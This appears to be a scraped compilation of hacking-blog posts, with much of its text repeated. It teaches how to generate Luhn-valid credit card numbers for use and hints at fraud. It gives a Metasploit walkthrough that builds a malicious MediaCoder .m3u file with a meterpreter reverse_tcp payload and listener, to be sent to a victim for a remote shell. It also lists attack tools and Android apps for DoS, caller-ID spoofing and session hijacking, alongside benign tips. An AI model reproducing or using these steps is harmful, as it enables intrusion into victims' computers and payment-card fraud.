How to set Admin account password without knowing the previous password:
How to set Admin account password without knowing the previous password:
1. Go to Control Panel
2. Click on Administrative Tools
3. Click on Computer Management."
4. Go to System Tools.
5. Then to Local Users and Groups
6. Under the USERS menu u will see all the accounts including the admin.
7. Right Click on the Admin account and select Set Password
8. Enter the new password without the old password
9. VOILA !!!! You are done..
1. Go to Control Panel
2. Click on Administrative Tools
3. Click on Computer Management."
4. Go to System Tools.
5. Then to Local Users and Groups
6. Under the USERS menu u will see all the accounts including the admin.
7. Right Click on the Admin account and select Set Password
8. Enter the new password without the old password
9. VOILA !!!! You are done..
How to generate valid credit card numbers by yourself (CreditCards Algorithm)
-----------------------Disclaimer-----------------------
This file is for educational purposes ONLY to show how insecure is our world!
I take no responsibility for your actions!
I'm NOT responsible for any damages you make!
The information in this file may be incorrect.
You can copy this file but mention the source Cyber Hacker and you are not allowed to change anything in this file without the author's permission.
This is a personal file which you are not supposed to read, so just go away.
TURN WORD WRAP ON IF YOU USE TEXT EDITOR
-------------------------------------------------
How to generate valid credit card numbers by yourself (Credit Cards Algorithm)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
If you desperately need a valid credit card number because you don't have
your credit card generator - generate a valid credit card number by
yourself!
The way of doing it, is simple - you just need to remember it. First of all
let me fast explain you about the credit card number. Credit cards use the
Luhn Check Digit Algorithm. The first number depends on the credit card
type, such as : Visa, Master Card, Discover etc. The folowing few numbers
depend on which bank the credit card belong to. The other numbers can be
any numbers. The last number will be the most important number. Here are a
few examples that will be useful later:
1. Visa [Citibank] - 4013 **** **** **** {Lenght: 16 numbers}
(Visa Cards begin with number 4. Number 013 - represents Citibank)
2. Gold Visa [Bank of America] - 4024 0238 **** **** {Lenght: 16 numbers}
(the number 4024 0238 in the beggining tells us that this is Gold Visa of the Bank of America)
3. Visa - 4*** **** **** ** {Lenght: 14 numbers}
(All Visa cards begins with number 4. This is an ordinary Visa card. It can be also 16 numbers)
4. Master Card [Bank of America] - 5254 **** **** **** {Lenght: 16 numbers}
(Master cards begin with 5 in the beggining and the other few numbers depend on the bank)
5. Master Card [Citibank] - 5424 **** **** **** {Lenght: 16 numbers}
(Master card that belongs to Citibank)
There are lots and lots of other credit cards numbers but this will be
enough for now. So as you should understand by now - the first numbers
depend on which bank it belongs to and what credit card it is. The lenght
of the numbers depends on the credit card type too.
All the other numbers except the last one can be whatever you wish! The last
numbers is the one that will determine the validation of the credit card number.
Example #1:
-=-=-=-=-=-
So lets take for example the first Visa [Citibank]:
4013 **** **** *** X
|__| |___________| |________________All depends on this number!
| |
| |___Any numbers you wish.
|
|_____This number says it belongs to Citibank and it's a Visa card.
Now we want to generate our own valid credit card number. The number must
begin with those numbers (4013 or any other number which belongs to credit
card company/bank). Without them it won't be valid. As i said, there are a
lot of credit cards - you can use one of the list above.
We took the Visa [Citibank] number for the first example.
[1] The "*" represents any number. So lets choose them (ANY 11 numbers!):
Before we choosed any numbers: 4013 **** **** *** X
|||| |||| |||
We get this after choosing the numbers: 4013 5426 7346 375 X
[2] We need to add together every second number:
4013 5426 7346 375 X
| | | | | | | |
0+3 +4+6 +3+6 +7 +X
We need to find the "X" so it will create a valid credit card number, so
for now we don't count it. We get:
0+3+4+6+3+6+7=29 < -= Final sum of section #2
[3] Now we need to multiply by 2 any other numbers and add them together. If
the number bigger than 9 - we subtract 9 from the number, this to get a
one digit number.
4013 5426 7346 375 X
| | | | | | | |
4 1 5 2 7 4 3 5
Multiply by 2:
4*2=8
1*2=2
5*2=10-9=1 (the number is bigger then 9)
2*2=4
7*2=14-9=5 (the number is bigger then 9)
4*2=8
3*2=6
5*2=10-9=1 (the number is bigger then 9)
Add them together:
8+2+1+4+5+8+6+1=35 < -= Final sum of section #3
[4] Now we take the final sum of section #2 and add it to the final sum of
section #3. We get:
29+35=64
[5] Now we need to take a bigger number that can be devided by 10. The
closest one is 70. (if we get 64 then we go up to the next number that
can be devided by 10 - we get 70. The same with others: 37...40, 24...30,
59...60 etc). If we get number that can be devided by 10 (in section #4)
then we leave it unchangble. In other words, numbers like 10, 20, 30, 40
etc are left the same because they can be devided by 10.
64...70
[6] Now we subtract the smaller number from the bigger number and we get:
70-64=6
Waaallla! 6 is the last number [X=6]. Then the final VALID credit card
number is:
4013 5426 7346 375 X
|||| |||| |||| ||| |
4013 5426 7346 375 6
Yes! The number 4013 5426 7346 3756 is a valid credit card number!
The expire date and the name are not related to the credit card number, thus
the expire date or the name can be whatever you want.
You can check a validation of a credit card number by the same method and if
you get the same last number as it is in the credit number
(the one you want to check) then it is a valid credit card number.
Here are another few examples so you will take a little practice and
understand the whole process:
Example #2:
-=-=-=-=-=-
Gold Visa [Bank of America] - 4024 0238 **** ****
[1] Choose any numbers:
4024 0238 3425 642X
[2] Add together every second number (Except "X"):
0+4+2+8+4+5+4=27 < -= Final sum of sec. #2
[3] Multiply by 2 any other numbers (subtract 9 if it's bigger than 9) and
add them together:
4*2=8
2*2=4
0*2=0
3*2=6
3*2=6
2*2=4
6*2=12-9=3
2*2=4
8+4+0+6+6+4+3+4=35 < -= Final sum of sec. #3
[4] Adding sum of sec. #2 to sum of sec. # 3:
35+27=62
[5] Take the closest bigger number that can be devided by 10:
62...70
[6] Subtract:
70-62=8
X=8
Final VALID credit card number:
4024 0238 3425 6428
===================
Example #3:
-=-=-=-=-=-
Visa - 4*** **** **** **
[1] Choose any numbers:
4921 2354 4364 0X
[2] Add together every second number (Except "X"):
9+1+3+4+3+4=24
[3] Multiply by 2 any other numbers (subtract 9 if it's bigger than 9) and
add them together:
4*2=8
2*2=4
2*2=4
5*2=10-9=1
4*2=8
6*2=12-9=3
0*2=0
8+4+4+1+8+3+0=28
[4] Adding sum of sec. #2 to sum of sec. # 3:
24+28=52
[5] Take the closest bigger number that can be devided by 10:
52...60
[6] Subtract:
60-52=8
X=8
Final VALID credit card number:
4921 2354 4364 08
=================
That's not that hard after you practice it a bit.
Ohh... Btw the number 4123 456 789 1235 is a valid credit card number, but if you will use credit cards like this one, you will loose the game faster then you think.
This file is for educational purposes ONLY to show how insecure is our world!
I take no responsibility for your actions!
I'm NOT responsible for any damages you make!
The information in this file may be incorrect.
You can copy this file but mention the source Cyber Hacker and you are not allowed to change anything in this file without the author's permission.
This is a personal file which you are not supposed to read, so just go away.
TURN WORD WRAP ON IF YOU USE TEXT EDITOR
-------------------------------------------------
How to generate valid credit card numbers by yourself (Credit Cards Algorithm)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
If you desperately need a valid credit card number because you don't have
your credit card generator - generate a valid credit card number by
yourself!
The way of doing it, is simple - you just need to remember it. First of all
let me fast explain you about the credit card number. Credit cards use the
Luhn Check Digit Algorithm. The first number depends on the credit card
type, such as : Visa, Master Card, Discover etc. The folowing few numbers
depend on which bank the credit card belong to. The other numbers can be
any numbers. The last number will be the most important number. Here are a
few examples that will be useful later:
1. Visa [Citibank] - 4013 **** **** **** {Lenght: 16 numbers}
(Visa Cards begin with number 4. Number 013 - represents Citibank)
2. Gold Visa [Bank of America] - 4024 0238 **** **** {Lenght: 16 numbers}
(the number 4024 0238 in the beggining tells us that this is Gold Visa of the Bank of America)
3. Visa - 4*** **** **** ** {Lenght: 14 numbers}
(All Visa cards begins with number 4. This is an ordinary Visa card. It can be also 16 numbers)
4. Master Card [Bank of America] - 5254 **** **** **** {Lenght: 16 numbers}
(Master cards begin with 5 in the beggining and the other few numbers depend on the bank)
5. Master Card [Citibank] - 5424 **** **** **** {Lenght: 16 numbers}
(Master card that belongs to Citibank)
There are lots and lots of other credit cards numbers but this will be
enough for now. So as you should understand by now - the first numbers
depend on which bank it belongs to and what credit card it is. The lenght
of the numbers depends on the credit card type too.
All the other numbers except the last one can be whatever you wish! The last
numbers is the one that will determine the validation of the credit card number.
Example #1:
-=-=-=-=-=-
So lets take for example the first Visa [Citibank]:
4013 **** **** *** X
|__| |___________| |________________All depends on this number!
| |
| |___Any numbers you wish.
|
|_____This number says it belongs to Citibank and it's a Visa card.
Now we want to generate our own valid credit card number. The number must
begin with those numbers (4013 or any other number which belongs to credit
card company/bank). Without them it won't be valid. As i said, there are a
lot of credit cards - you can use one of the list above.
We took the Visa [Citibank] number for the first example.
[1] The "*" represents any number. So lets choose them (ANY 11 numbers!):
Before we choosed any numbers: 4013 **** **** *** X
|||| |||| |||
We get this after choosing the numbers: 4013 5426 7346 375 X
[2] We need to add together every second number:
4013 5426 7346 375 X
| | | | | | | |
0+3 +4+6 +3+6 +7 +X
We need to find the "X" so it will create a valid credit card number, so
for now we don't count it. We get:
0+3+4+6+3+6+7=29 < -= Final sum of section #2
[3] Now we need to multiply by 2 any other numbers and add them together. If
the number bigger than 9 - we subtract 9 from the number, this to get a
one digit number.
4013 5426 7346 375 X
| | | | | | | |
4 1 5 2 7 4 3 5
Multiply by 2:
4*2=8
1*2=2
5*2=10-9=1 (the number is bigger then 9)
2*2=4
7*2=14-9=5 (the number is bigger then 9)
4*2=8
3*2=6
5*2=10-9=1 (the number is bigger then 9)
Add them together:
8+2+1+4+5+8+6+1=35 < -= Final sum of section #3
[4] Now we take the final sum of section #2 and add it to the final sum of
section #3. We get:
29+35=64
[5] Now we need to take a bigger number that can be devided by 10. The
closest one is 70. (if we get 64 then we go up to the next number that
can be devided by 10 - we get 70. The same with others: 37...40, 24...30,
59...60 etc). If we get number that can be devided by 10 (in section #4)
then we leave it unchangble. In other words, numbers like 10, 20, 30, 40
etc are left the same because they can be devided by 10.
64...70
[6] Now we subtract the smaller number from the bigger number and we get:
70-64=6
Waaallla! 6 is the last number [X=6]. Then the final VALID credit card
number is:
4013 5426 7346 375 X
|||| |||| |||| ||| |
4013 5426 7346 375 6
Yes! The number 4013 5426 7346 3756 is a valid credit card number!
The expire date and the name are not related to the credit card number, thus
the expire date or the name can be whatever you want.
You can check a validation of a credit card number by the same method and if
you get the same last number as it is in the credit number
(the one you want to check) then it is a valid credit card number.
Here are another few examples so you will take a little practice and
understand the whole process:
Example #2:
-=-=-=-=-=-
Gold Visa [Bank of America] - 4024 0238 **** ****
[1] Choose any numbers:
4024 0238 3425 642X
[2] Add together every second number (Except "X"):
0+4+2+8+4+5+4=27 < -= Final sum of sec. #2
[3] Multiply by 2 any other numbers (subtract 9 if it's bigger than 9) and
add them together:
4*2=8
2*2=4
0*2=0
3*2=6
3*2=6
2*2=4
6*2=12-9=3
2*2=4
8+4+0+6+6+4+3+4=35 < -= Final sum of sec. #3
[4] Adding sum of sec. #2 to sum of sec. # 3:
35+27=62
[5] Take the closest bigger number that can be devided by 10:
62...70
[6] Subtract:
70-62=8
X=8
Final VALID credit card number:
4024 0238 3425 6428
===================
Example #3:
-=-=-=-=-=-
Visa - 4*** **** **** **
[1] Choose any numbers:
4921 2354 4364 0X
[2] Add together every second number (Except "X"):
9+1+3+4+3+4=24
[3] Multiply by 2 any other numbers (subtract 9 if it's bigger than 9) and
add them together:
4*2=8
2*2=4
2*2=4
5*2=10-9=1
4*2=8
6*2=12-9=3
0*2=0
8+4+4+1+8+3+0=28
[4] Adding sum of sec. #2 to sum of sec. # 3:
24+28=52
[5] Take the closest bigger number that can be devided by 10:
52...60
[6] Subtract:
60-52=8
X=8
Final VALID credit card number:
4921 2354 4364 08
=================
That's not that hard after you practice it a bit.
Ohh... Btw the number 4123 456 789 1235 is a valid credit card number, but if you will use credit cards like this one, you will loose the game faster then you think.
Remove Virus From Pendrive.
f you are using pendrive for data transfer at school, college or at your office or any where
you must have come across the VIRUS creates an exe file in your usb drive with the name New Folder.exe.
► WITH THIS VIRUS
Task manager is disabled.
you must have come across the VIRUS creates an exe file in your usb drive with the name New Folder.exe.
► WITH THIS VIRUS
Task manager is disabled.
Registry Editor is disabled.
Folder options not working.
Taking too much time for accessing pendrive.
Uses half of your computers processing power.
► Now you can easily remove this virus
Just download the tool from the link below.
Run this downloaded exe by double clicking on it.
Then click on “Delete Autorun.inf file”.
After that click on ” Remove virus from USB”. The virus will be removed from your pendrive.
with this tool you cal also restore your task manager, registry editor and other things which were disabled by virus
just click on “Restore Default Windows Settings”. thats it...........
Change Folder Background Picture in
Windows 7
Change Folder Background Picture in Windows 7
Guide To Use Folder Background Changer.
You Can change The folder Background Image using folder background changer the download link is give at last of this post.
1. Download The Background Changer :-Click Here
2. Extract the Zip file In Your Pc.
3. Run W7FBC1.1.exe as administrator (right click on the software and select run as administrator) you can see the example pic below.
4. After some time it will show the window like below
5. Just select the folder which you want to change the picture
6. Now click on change background image and select you image you can also Text color.
5. Just select the folder which you want to change the picture
6. Now click on change background image and select you image you can also Text color.
7. Done You Can see the priview like below.
8. To uninstall just click on uninstall it will restore you windows folder setting.
9. if you want to to change again then just follow the first step again.
9. if you want to to change again then just follow the first step again.
Download Folder Background Changer.
Get PC detail using CMD code.
Get PC detail using CMD code.
We always see many types of software which give you detail about your computer like about Ram,hardsk,processor and another thing about your pc. but we do not need to really check all this information about our pc we can get this much of information using command promote(CMD).here is the trick how to see your computer detail using CMD

1. Start -> Run -> And type there cmd. command promote will open.
2. Type systeminfo (see the bellow photo)

3.Now you can see your computer full configuration in detail here is a example photo of this.

Note: If you error message, may you are not activated DCOM Server Process Launcher service. To activate this service open Services window from "Start | Control Panel | Administrative Tools | Services" then start "DCOM Server Process Launcher" service.
Enjoy(-_-)

1. Start -> Run -> And type there cmd. command promote will open.
2. Type systeminfo (see the bellow photo)

3.Now you can see your computer full configuration in detail here is a example photo of this.

Note: If you error message, may you are not activated DCOM Server Process Launcher service. To activate this service open Services window from "Start | Control Panel | Administrative Tools | Services" then start "DCOM Server Process Launcher" service.
Enjoy(-_-)
Hack Windows 7 PC Remotely using MediaCoder .M3U Buffer Overflow
Exploit Targets
MediaCoder 0.8.22
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Open Kali Linux terminal type msfconsole
Now type use exploit/windows/fileformat/mediacoder_m3u
msf exploit (mediacoder_m3u)>set payload
windows/meterpreter/reverse_tcp
msf exploit (mediacoder_m3u)>set lhost 192.168.1.147 (IP of Local Host)
msf exploit (mediacoder_m3u)>exploit
After we successfully generate the malicious m3u File, it will
stored on your local computer
/root/.msf4/local/msf.m3u
Now we need to set up a listener to handle reverse
connection sent by victim when the exploit successfully
executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.147
exploit
Now send your msf.m3u files to victim, as soon as they
download and open it. Now you can access meterpreter shell
on victim computer.


Top 15 Hacking |Cracking| Pentesting
Tools of 2013
Here represent Top 15 Hacking or cracking tools for you all hackerspositive fanz. They is bests of 2013 hacking tools.
1. PWN STAR
A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..

General Features:
- Managing Interfaces and MAC Spoofing
- Set sniffing
- Phishing Web
- Karmetasploit
- WPA handshake
- De-auth client
- Managing Iptables
2. ZED ATTACK PROXY (ZAP)
(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.

Key Features:
- Intercepting Proxy
- Active scanners
- Passive scanners
- Brute Force scanner
- Spider
- Fuzzer
- Port Scanner
- Dynamic SSL certificates
- API
- Beanshell integration
ZAP Download Here:
3. SET (SOCIAL ENGINEERING TOOLKIT)
Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.

Key Features:
- Spear-Phishing Attack Vector
- Java Applet Attack Vector
- Metasploit Browser Exploit Method
- Credential Harvester Attack Method
- Tabnabbing Attack Method
- Man Left in the Middle Attack Method
- Web Jacking Attack Method
- Multi-Attack Web Vector
- Infectious Media Generator
- Teensy USB HID Attack Vector
4. BURP SUITE
Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.

General Function:
- Interception proxies
- Radar and spiders crawling
- Webapps scanner
- Tool assault
- Repeater and sequencer tools
5. ETTERCAP
Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.
General Function:
- To capture traffic and data
- To do logging network
- Etc.
6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)
The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.

General Function SIFT:
- iPhone, Blackberry, and Android Forensic Capabilities
- Registry Viewer (YARU)
- Compatibility with F-Response Tactical, Standard, and Enterprise
- PTK 2.0 (Special Release - Not Available for Download)
- Automated Generation Timeline via log2timeline
- Many Firefox Investigative Tools
- Windows Journal Parser and Shellbags Parser (jp and sbag)
- Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)
- Complete Overhaul of Regripper Plugins (added over 80 additional plugins)
7. WIRESHARK
Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.
General Function:
- Live capture and offline analysis
- Standard three-pane packet browser
- Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
- Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility
- The most powerful display filters in the industry
- Rich VoIP analysis
- Read / write many different capture file formats
- Etc.
WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.

Key Features:
[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack
9. WINAUTOPWN
WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. Widely used by "Defacer" Indonesia to deface the Windows Server

10. HASHCAT
Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.
General Function:
- Multi-Threaded
- Free
- Multi-Hash (up to 24 million hashes)
- Multi-OS (Linux, Windows and OSX native binaries)
- Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
- SSE2 accelerated
- All Attack-Modes except Brute-Force and Permutation can be extended by rules
- Very fast Rule-engine
- Rules compatible with JTR and PasswordsPro
- Possible to resume or limit session
- Automatically recognizes recovered hashes from outfile at startup
- Can automatically generate random rules
- Load saltlist from an external file and then use them in a Brute-Force Attack variant
- Able to work in an distributed environment
- Specify multiple wordlists or multiple directories of wordlists
- Number of threads can be configured
- Lowest priority threads run on
- 30 + Algorithms is implemented with performance in mind
- ... and much more
11. UNISCAN
Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.

General Function:
- Identification of system pages through a Web Crawler.
- Use of threads in the crawler.
- Control the maximum number of requests the crawler.
- Control of variation of system pages identified by Web Crawler.
- Control of file extensions that are ignored.
- Test of pages found via the GET method.
- Test the forms found via the POST method.
- Support for SSL requests ( HTTPS ).
- Proxy support.
- Generate site list using Google.
- Generate site list using Bing.
- Plug-in support for Crawler.
- Plug-in support for dynamic tests.
- Plug-in support for static tests.
- Plug-in support for stress tests.
- Multi-language support.
- Web client.
12. OLYYDBG
OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.
General Function:
- Intuitive user interface, no cryptical commands
- Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
- Directly loads and debugs DLLs
- Object file scanning - locates routines from object files and libraries
- Allows for user-defined labels, comments and function descriptions
- Understands debugging information in Borland ® format
- Saves patches between sessions, writes them back to executable file and updates fixups
- Open architecture - many third-party plugins are available
- No installation - no trash in registry or system directories
- Debugs multithreaded applications
- Attaches to running programs
- Configurable disassembler, supports both MASM and IDEAL formats
- MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions
- Full UNICODE support
- Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
- Recognizes complex code constructs, like call to jump to procedure
- Decodes calls to more than 1900 standard API and 400 C functions
- Gives context-sensitive help on API functions from external help file
- Sets conditional, logging, memory and hardware breakpoints
- Traces program execution, logs arguments of known functions
- Shows fixups
- Dynamically traces stack frames
- Searches for imprecise commands and masked binary sequences
- Searches whole allocated memory
- Finds references to constant or address range
- Examines and modifies memory , sets breakpoints and Pauses program on-the-fly
- Assembles commands into the shortest binary form
- Starts from the floppy disk
13. BBQSQL
BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.

General Function:
- SQL Injection Tools
- URL
- HTTP Method
- Headers
- Cookies
- Encoding methods
- Redirect behavior
- Files
- HTTP Auth
- Proxies
Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.

General Function:
- Crack various kinds of hash
- Showing results from crackhash
- Cracking on various OS platforms
15. SAMURAI WEB TESTING FRAMEWORK (SWTF)
SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. Very comprehensive and widely used in the world, including one used by staff binushacker

General Function:
- Web Scanner
- Web Mapping
- Web Exploitation
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.
Top 10 Android Apps that Turns Your Phone into a Hacking Device
The risk of hacking by using mobile devices is very common and people are developing and using different apps (application) for their hacking attack. Android has faced different challenges from hacking application and below is the list of application for android hacking
1. SpoofApp
Here is an app that spies at heart could use – SpoofApp. It allows you to use a fake Caller ID – a number that you are free to specify yourself, in order to protect your privacy or to pull a prank on someone. Sounds like fun, doesn’t it? Well, Apple didn’t think so, which is why it never allowed the app to enter its App Store. Google, however, didn’t mind, which is why SpoofApp was available on the Android Market for about two and a half years. However, it was banned from there last year as it allegedly was in conflict with The Truth in Caller ID Act of 2009.This can be useful in social engineering.
2. Andosid
AnDOSid is the application which is used for DOS attacks from Android mobile phones.
3.FaceNiff
Requirements: Android 2.1+ (rooted)
Overview: FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It’s kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!). Please note that if webuser uses SSL this application won’t work.
4. Nmap For Android
Nmap is a network scanner tool which gives the entire information of the ip address and website. There is a version of nmap for Android users too, with the help of this app hackers can scan the ip's through mobiles.
CLICK HERE TO DOWNLOAD
5. Anti-Android Network Toolkit
Requirements: Android 2.1+ (rooted)
Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities to DoS attacks and other threats.
CLICK HERE TO DOWNLOAD
CLICK HERE TO DOWNLOAD
6. SSHDroid- Android Secure Shell
Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").
7. WiFi Analyzer
CLICK HERE TO DOWNLOAD
8. Network Discovery
Network Discovery is a handy tool for finding and enumerating devices on public WiFi networks. Network Discovery uses a simple ping scan to find hosts on the network, and then allows the user to select one of the found hosts to target for a TCP connect() scan.CLICK HERE TO DOWNLOAD
9. The Android Network Toolkit
The Android Network Toolkit is an complete tool kit for the pentesters , where hackers can find expolots using the mobile and penetrate or attacks the ip's according to their vunerabilities.
CLICK HERE TO DOWNLOAD
10. ConnectBot
ConnectBot is an exceptionally well done SSH/Telnet client, which also acts as a terminal emulator for the local Linux sub-system. While there are better terminal emulators (though not for free), there is no question that ConnectBot is the absolute best SSH client available for Android.CLICK HERE TO DOWNLOAD
How to secure your smartphone from hackers
Now a days, We are using smartphone for our daily life such E-mail, facebook, twitter, paypal, banking etc..its all the our personal working. So their is more important to protect our smartphone from being hacked.
Using some security improvement helps you to protect your phone. Actually the method which you adopt to protect your computer can be used to protect your smartphone too. Use following given below tips to secure your smart phone.
You can also use the some Antivirus & Security for protect your smartphone
Top 7 Android Security-Antiviurs Apps
1. Use Passcodes Everywhere:
Whether you have an Android phone or an iPhone, you can prevent access to your device by adding a passcode or a lock pattern on Android. This simple security measure can save tour sensitive information This is especially important if you have a bunch of apps installed where personal data is stored like financial apps (Mint, bank apps, etc), note apps etc.The home screen passcode is important because a lot of the email apps (Mail on iPhone and Gmail on Android) don’t even have an option to passcode your email. Emails can contain a lot of private information and since most people go to parties and leave their phones on tables and counters. Sp passcode is necessary.
2. Protect Your iCloud & Google Account:
The second thing most is that if someone can access into your iCloud or Google account, they can gain access to a lot of data that you might be creating and editing from your smartphone. In these times, it’s a necessary to enable 2-step verification on both of these accounts.Your Google account basically logs you into all Google services from YouTube to Gmail to Google Play to Google Maps to Google Calendar to Picasa to Google+, etc, etc, etc.
3. Avoid Jailbreaking or Rooting Your Smartphone:
If you are jailbreak or root your phone for fun and enjoyment, then good for you. But you have to avoid this because it can mess up your phone and cause you more grief than happiness. Secondly, you won’t be able to update your phone with the latest updates to the OS since it’ll be in an unsupported mode.
4. Be Careful With the Apps You Install:
This is especially important on Android devices. Google recently removed 50,000 apps that were suspected containing viruses. There are a lot of apps that contain malware, viruses or other sneaky software to steal your data or damage your phone. The Apple app store also has this problem.So,be careful about installing apps.
5. Use an App Instead of the Browser:
If you’re doing banking on your phone or stock trading or anything else that contain personal sensitive information between your phone and the Internet, it’s best to use an official app for that site or company rather than opening using the browser on your phone.For example, Chase, Bank of America and lots of other big financial institutions have their own apps for iOS and Android.
6. Control What an App Can Access:
You’ve probably seen the following message on your iPhone a hundred times already:There are all types of these “AppName Would Like to Access Your Data” messages. Data can be photos, location, contacts etc. Don’t just click OK all the time. If you click anything all the time, it’s better to just choose Don’t Allow and if you really can’t use the app later on, you can manually go back in and change it to allow access.
7. Keep Data Backed Up:
It’s not only a good idea to keep your smartphone backed up in case if it gets stolen and you have to remotely wipe it clean. Apple users can install the Find My iPhone app, which will let you remotely lock a phone and remotely wipe it if you know it’s been stolen.If you don’t have your data backed up, you’ll lose it all if it’s stolen. If you back it up locally or in the cloud, you’ll be able to wipe your phone and get all your data back on your new phone.On Android, there is a built-in backup tool, but it doesn’t backup everything on your phone like the iOS does.
8. Report Your Phone Stolen:
There has been a stolen phone database created that is shared between the major wireless carriers. You can report your phone stolen and that will prevent anyone from connecting to the carrier and using data or minutes. If they try to wipe it, replace the SIM, etc, it still won’t allow them to activate on any of the carriers because of the serial number.
9. Update the OS:
Just like you have to constantly install Microsoft security updates for your PC, it’s a good idea to install the latest updates for your smartphone. If there are no major issues with the update like degradation of battery life, etc, but if nothing stands out, then update the phone.In addition to updating the OS, it’s also a good idea to update the apps installed on your phone.
10. Wireless & Bluetooth:When you’re not at home, it’s best to try to disable the wireless and bluetooth altogether and use your 3G or 4G connection if you can. The moment you connect to an untrusted wireless network, you’re open to hackers scanning for victims over the network. A hacker try to connect to your smartphone and steal data, etc.If bluetooth is enabled and discoverable, it gives hackers another way to possibly see the data being passed between the bluetooth device and your phone
Ultimate All Mobile Tips and Tricks And GSM SECRETS
I provide the secret tips and tricks for all leading mobile phone/cell phone like LG, Nokia, Samsung, Motorola,sony ericson And GSM Secret.
To check IMEI (International Mobile Equipment Identity) for any mobile or cellular phone.
On the main screen type *#06#
Information you get from the IMEI (International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type approval code of your Nokia Mobile
FAC = Final assembly code of your cell phone
SNR = Serial number of your Nokia Phone
SP = Spare
FOR LG
LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*
LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
